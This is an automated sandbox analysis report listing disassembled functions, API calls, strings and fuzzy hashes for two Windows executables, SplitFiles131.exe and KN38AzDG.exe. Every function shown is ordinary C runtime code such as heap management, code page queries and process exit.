Instruction Fuzzy Hash: F8E04F7F410360BF960A2F56BC51685BA25B75570AB4002ABFC0436233CB759051AB8D

Uniqueness

Uniqueness Score: -1.00%

Function 100075A4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 100075AD

Part of subcall function 10008701: RtlFreeHeap.NTDLL(00000000,00000000,?,100074AC), ref: 10008717
Part of subcall function 10008701: GetLastError.KERNEL32(?,?,100074AC), ref: 10008729

_free.LIBCMT ref: 100075C0
_free.LIBCMT ref: 100075D1
_free.LIBCMT ref: 100075E2

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 560e9729131f36da597d803f7365e1613d92c0d7e1160fc99f91f24202a3e63e
Instruction ID: 11fb011ea0374647b44fdc306d41bcbb37fa874d581b786af2f79b002bb734ee
Opcode Fuzzy Hash: 560e9729131f36da597d803f7365e1613d92c0d7e1160fc99f91f24202a3e63e
Instruction Fuzzy Hash: 82E0EC79825130EBFB52AF149CC28493E66FB58B803A5C00AF86812239D732D7529FA5

Uniqueness

Uniqueness Score: -1.00%

Function 00403B40 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00403CD6
___std_exception_destroy.LIBVCRUNTIME ref: 00403D70

Strings

`=@, xrefs: 00403D1C

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: `=@
API String ID: 2970364248-2879527708
Opcode ID: 020cfde67c81afc4d71945b4c587ce0ffd10af12ed6690544abac246daa8197c
Instruction ID: 13c42e399c2991b93d131e87cfc8b99e3a8f7b3fd8cb1136b6e867019d48ab5a
Opcode Fuzzy Hash: 020cfde67c81afc4d71945b4c587ce0ffd10af12ed6690544abac246daa8197c
Instruction Fuzzy Hash: 1A718271A002589BDB04CF99C881BDDFBB5EF49314F14822EE805B7385D779AA44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00419A5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00419AED

Strings

pow, xrefs: 00419AC5, 00419AE2

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: a582e46973c46f5eef58ff1d0f172840d36d42b9c83d8389a540df618c71c77d
Instruction ID: 71e70a3d575cb920f3d1b965d95ae51b65b63d53711f17dc4a41893a615c4c2c
Opcode Fuzzy Hash: a582e46973c46f5eef58ff1d0f172840d36d42b9c83d8389a540df618c71c77d
Instruction Fuzzy Hash: 62517D71B0810195CB12BF14F9613AB77B0EB40B52F7448ABE4C5423A9EA3C8ED59A4E

Uniqueness

Uniqueness Score: -1.00%

Function 004248DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 00424479: GetOEMCP.KERNEL32(00000000,004246EA,00000000,00418194,?,?,00418194,?,00000000), ref: 004244A4

IsValidCodePage.KERNEL32(-00000030,00000000,51F44589,?,?,?,00424731,?,00000000,00000000,?,?), ref: 0042493C
GetCPInfo.KERNEL32(00000000,1GB,?,?,00424731,?,00000000,00000000,?,?,?,?,?,?,00418194,?), ref: 0042497E

Strings

1GB, xrefs: 00424979, 0042497C

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID: 1GB
API String ID: 546120528-4244811723
Opcode ID: aee94ae5ee01cc59593c3c75f0455c1e87f97389cb9c7ba2e998998210576ad8
Instruction ID: aacb25a9507ad1c205b6f49fc7500e8a924766a2b9ce2c8cd014c0b8cff2f0c3
Opcode Fuzzy Hash: aee94ae5ee01cc59593c3c75f0455c1e87f97389cb9c7ba2e998998210576ad8
Instruction Fuzzy Hash: F55125B0B002648EDB21DF76E4407BBBBE4EFD1304F94406FD08687251D7789582CB49

Uniqueness

Uniqueness Score: -1.00%

Function 0042454F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(0000FDE9,?,0000000C,00000000,00000000), ref: 00424581

Strings

, xrefs: 004245C6
tIB, xrefs: 00424566

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: Info
String ID: $tIB
API String ID: 1807457897-3257070604
Opcode ID: f173a03a340fb3b3c2833dae6a272a5206f12199cae729be784c9ef2206b4439
Instruction ID: 4a28d2029068e78a01aac7d99e26ab956f5ac8d9ba36b8a867b1e1f291c49a90
Opcode Fuzzy Hash: f173a03a340fb3b3c2833dae6a272a5206f12199cae729be784c9ef2206b4439
Instruction Fuzzy Hash: 54418E70704268ABDB218B18DD84BFB77FDDB96308FA404EEE5C687142D27C9A85CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041A2ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Program Files (x86)\Split Files\SplitFiles131.exe, xrefs: 0041A330, 0041A337, 0041A36D

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Program Files (x86)\Split Files\SplitFiles131.exe
API String ID: 0-4111602209
Opcode ID: 0e731db7584ad60d578d779bbaf5b01c679ed323d4b1edda6f57c3d6e2435286
Instruction ID: b8ab9d9bf59b97dbdceff1942ea396bbaab855526052e627d1082f7e5706c01d
Opcode Fuzzy Hash: 0e731db7584ad60d578d779bbaf5b01c679ed323d4b1edda6f57c3d6e2435286
Instruction Fuzzy Hash: C041B671A01218AFCB16DF9ADC85ADFBBB8EB85314F10016BF81097341D7789A91CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 10006DF4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Program Files (x86)\Split Files\SplitFiles131.exe, xrefs: 10006E37, 10006E74

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID:
String ID: C:\Program Files (x86)\Split Files\SplitFiles131.exe
API String ID: 0-4111602209
Opcode ID: 1ece5218b2422689d95aac8363c4354a6b0412c233e2753c981cf0bd8d1cf806
Instruction ID: 646097fc6b5d669f55448d5f467022a3e50ec9bcd71d7e0a9af30093925523d1
Opcode Fuzzy Hash: 1ece5218b2422689d95aac8363c4354a6b0412c233e2753c981cf0bd8d1cf806
Instruction Fuzzy Hash: 8A41AF79E00295AFEB21CB99DC8199EBBFAEB897D0B304066F90497205D7719F41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 004124BC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 004124E1

Strings

RCC, xrefs: 004124FB
MOC, xrefs: 004124F3

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 188dd02d7599aa30b8f70c009784331bdac1aa484947d381b84c6db6c6d716c1
Instruction ID: ad6c17696073472ca42aa8dfa0ec8590c08af3ebdb16e25686bd643ee096a47e
Opcode Fuzzy Hash: 188dd02d7599aa30b8f70c009784331bdac1aa484947d381b84c6db6c6d716c1
Instruction Fuzzy Hash: 2A416A71900109BFCF16DF94CE91AEEBBB6FF48304F18806AF905A7251D3799AA0DB54

Uniqueness

Uniqueness Score: -1.00%

Function 10004FCB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 10004FF0

Strings

RCC, xrefs: 1000500A
MOC, xrefs: 10005002

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 4d7ed7e1a438cb125378e558f69cca30710cf17c4f75dbaa5e6bce22c7dbe1d5
Instruction ID: d582f20fa4c8ccc8f50c3cacdc6089d2bedb682b0b99dde694d4e72c5554890f
Opcode Fuzzy Hash: 4d7ed7e1a438cb125378e558f69cca30710cf17c4f75dbaa5e6bce22c7dbe1d5
Instruction Fuzzy Hash: EB41AC71900209EFEF16CF94CC81AEE7BB5FF48385F158099F909A7265D736AA50CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00403F10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00403F3B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00403F8A

Part of subcall function 0040E386: _Yarn.LIBCPMT ref: 0040E3A5
Part of subcall function 0040E386: _Yarn.LIBCPMT ref: 0040E3C9

Strings

bad locale name, xrefs: 00403FA6

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 0698450c758f5080945dd03671431322a62a555b97a6e35c8aa63d649f4640dc
Instruction ID: 0e1965beb74f9ff9c4f9f037bd33cd57e17261f8de89b9630023cdf888844aec
Opcode Fuzzy Hash: 0698450c758f5080945dd03671431322a62a555b97a6e35c8aa63d649f4640dc
Instruction Fuzzy Hash: E0119171904B849FD320CF69C901747BBF4EB19714F004A2EE849D3B81D7B9A504CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00409290 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 0040EF48: EnterCriticalSection.KERNEL32(004504FC,00450D8D,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF53
Part of subcall function 0040EF48: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF90

__Init_thread_footer.LIBCMT ref: 0040931D

Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2

Strings

YA, xrefs: 004092C5
CGVZ, xrefs: 004092BE

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: CGVZ$YA
API String ID: 2296764815-3168216772
Opcode ID: 6b3f2edf672ee7163d045f6b3c2ee22b3a52908d77dd1c4be6e8844974e40f80
Instruction ID: e9a20a430b0b6afe83743553c5755eaecc9671b6d7f01568723836dade792edc
Opcode Fuzzy Hash: 6b3f2edf672ee7163d045f6b3c2ee22b3a52908d77dd1c4be6e8844974e40f80
Instruction Fuzzy Hash: 94012679E003089BCB20DFA5EC4159DB3B0EB09711F5006BEE90677392E778AA05CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00409460 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 0040EF48: EnterCriticalSection.KERNEL32(004504FC,00450D8D,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF53
Part of subcall function 0040EF48: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF90

__Init_thread_footer.LIBCMT ref: 004094E0

Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2

Strings

F^, xrefs: 00409480
A@, xrefs: 00409477

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: A@$F^
API String ID: 2296764815-756130965
Opcode ID: b3d270ef5b96a7ee1581324bb411de95daac9417756f6a0bdbb33eb6c345495d
Instruction ID: 6c7a6d0756c4f162afa1c2070c0bcf59aef1f867ba74d1dc7902e0ff42b24005
Opcode Fuzzy Hash: b3d270ef5b96a7ee1581324bb411de95daac9417756f6a0bdbb33eb6c345495d
Instruction Fuzzy Hash: F901D239A003489BC710DFA9ED42599B370EB55701F5001BAE909673A2D678EA48CB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00424479 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,004246EA,00000000,00418194,?,?,00418194,?,00000000), ref: 004244A4
GetACP.KERNEL32(00000000,004246EA,00000000,00418194,?,?,00418194,?,00000000), ref: 004244BB

Strings

FB, xrefs: 00424481, 004244DE

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID:
String ID: FB
API String ID: 0-3670039715
Opcode ID: 68332179f40c49eab4e966d4ddaa84e174b0e6e01ad48db93ae2ad237c21ce19
Instruction ID: 521155ed4fd04c10d09fec07b2a217d09ec56201c3508306b013a50f1c28b22d
Opcode Fuzzy Hash: 68332179f40c49eab4e966d4ddaa84e174b0e6e01ad48db93ae2ad237c21ce19
Instruction Fuzzy Hash: 14F0C230600220DBCB14EB64E8487BD3770FB8133AFA00755E034872E2CBB49941CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00403D90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00403DAF

Strings

`=@, xrefs: 00403DB4
`=@, xrefs: 00403DCB

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: `=@$`=@
API String ID: 2659868963-2373854662
Opcode ID: 4b50160e959331e57da2a4db2d37d7e516b6b0fad8e09b272cf4e57e40a249b1
Instruction ID: c33fae4a20f9ec275494595788b59750feb4b5a2f93437c52e8352574578c9ea
Opcode Fuzzy Hash: 4b50160e959331e57da2a4db2d37d7e516b6b0fad8e09b272cf4e57e40a249b1
Instruction Fuzzy Hash: 2CF0ACB6A10716AB8714DF59D440882F7ECFF59320714C62BE519D7B00F7B4A954CBA4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: KN38AzDG.exePID: 1960, Parent PID: 4360COMMON

Execution Graph

Execution Coverage:	3.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1618
Total number of Limit Nodes:	29

Executed Functions

Function 001033EF Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,001033EE,?,?,?,?,?,00108F0E), ref: 00103411
TerminateProcess.KERNEL32(00000000,?,001033EE,?,?,?,?,?,00108F0E), ref: 00103418
ExitProcess.KERNEL32 ref: 0010342A

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 052c78deed26928714516b35ee275cc3bb0e0d665ec687f186f800347b271a5d
Instruction ID: aa162e06b481156fccc2cf5297f2480de7c039527bc6eaab19887daf9bdb70b0
Opcode Fuzzy Hash: 052c78deed26928714516b35ee275cc3bb0e0d665ec687f186f800347b271a5d
Instruction Fuzzy Hash: D2E04635000548EBCB226B64CD08A097B2EEB40381B008424F994CA971CBB5EEC2DE80

Uniqueness

Uniqueness Score: -1.00%

Function 00101889 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 3
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00001895,001010D6), ref: 0010188E

Strings

Pdhv, xrefs: 0010188E

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID: Pdhv
API String ID: 3192549508-2983560932
Opcode ID: 14835ed0ade8e428eb6bc9bab27f0d2bc55fc37df4caab215d23baa67ea67af2
Instruction ID: 4f973a1f12f043512906486a292cada798f920a4db72444f661ab343bbb03606
Opcode Fuzzy Hash: 14835ed0ade8e428eb6bc9bab27f0d2bc55fc37df4caab215d23baa67ea67af2
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00102FF1 Relevance: 4.6, APIs: 3, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00103081
_free.LIBCMT ref: 0010309C
_free.LIBCMT ref: 001030A7

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 389d60a7859338c8f59c9ee6415f2d50312ecccd14a85a2b60df1aac21876f8c
Instruction ID: 9df7bd42aa211e70efc8e88579b4202b5e67366714e42e855a25418985c1e356
Opcode Fuzzy Hash: 389d60a7859338c8f59c9ee6415f2d50312ecccd14a85a2b60df1aac21876f8c
Instruction Fuzzy Hash: 6821AD726082405BEF289F6898827B97B6DCF82314F240159F9D59B2C6EBE39F038250

Uniqueness

Uniqueness Score: -1.00%

Function 00105A23 Relevance: 4.6, APIs: 3, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00105A2C
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00105A9A

Part of subcall function 00105935: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,001071BC,00108F94,0000FDE9,00000000,?,?,?,00108D0D,0000FDE9,00000000,?), ref: 001059E1

Part of subcall function 001062BC: RtlAllocateHeap.NTDLL(00000000,00013385,00013385,?,001053EB,00000220,00108668,00013385,?,?,?,?,00000000,00000000,?,00108668), ref: 001062EE

_free.LIBCMT ref: 00105A8B

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: 23184b9b9a5499b4296af3ca1990952a8fb816179438bcb13eb10e98f8b1810a
Instruction ID: adc60b593c27c85850594da939d84f6fc314567dc85fdc684dcc17b79e3036c6
Opcode Fuzzy Hash: 23184b9b9a5499b4296af3ca1990952a8fb816179438bcb13eb10e98f8b1810a
Instruction Fuzzy Hash: 2001D8B2701A11FFE72116A65CC9C7B6A6ECEC6BA43150229B944D31C1EFD08D0189B0

Uniqueness

Uniqueness Score: -1.00%

Function 00102FA6 Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00105A23: GetEnvironmentStringsW.KERNEL32 ref: 00105A2C
Part of subcall function 00105A23: _free.LIBCMT ref: 00105A8B
Part of subcall function 00105A23: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00105A9A

_free.LIBCMT ref: 00102FDF
_free.LIBCMT ref: 00102FE6

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: _free$EnvironmentStrings$Free
String ID:
API String ID: 2490078468-0
Opcode ID: 8cf34415599fe6bb232796841d8778abddcab672b7226e276892b67cc7022974
Instruction ID: 38467319cb39185bc00abfb3892ba91641856677647974aff55c61bba31fa5f3
Opcode Fuzzy Hash: 8cf34415599fe6bb232796841d8778abddcab672b7226e276892b67cc7022974
Instruction Fuzzy Hash: 99E02273A0482246DB253729FC06A6B13224F927B1B120316F8A49B0C2EFF0084205A2

Uniqueness

Uniqueness Score: -1.00%

Function 001045DE Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,001042B2,00000001,00000364,00000006,000000FF,?,001045D0,00107A92,?,001072C9,?,00000000), ref: 0010461F

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fc8b30e368dc469c2527ea0d3245b52b0d319aaa1d4ec16371c545a74ab08fa6
Instruction ID: 63dcf0ca2b977c3a4e3db72bbe005702efd63ef0ae94ee4c4f124b01b7b185db
Opcode Fuzzy Hash: fc8b30e368dc469c2527ea0d3245b52b0d319aaa1d4ec16371c545a74ab08fa6
Instruction Fuzzy Hash: A3F0E97120052477DB216F269D85A6B3758DF92771F158111BAD4D71D0EBF1ED0186E0

Uniqueness

Uniqueness Score: -1.00%

Function 001062BC Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00013385,00013385,?,001053EB,00000220,00108668,00013385,?,?,?,?,00000000,00000000,?,00108668), ref: 001062EE

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
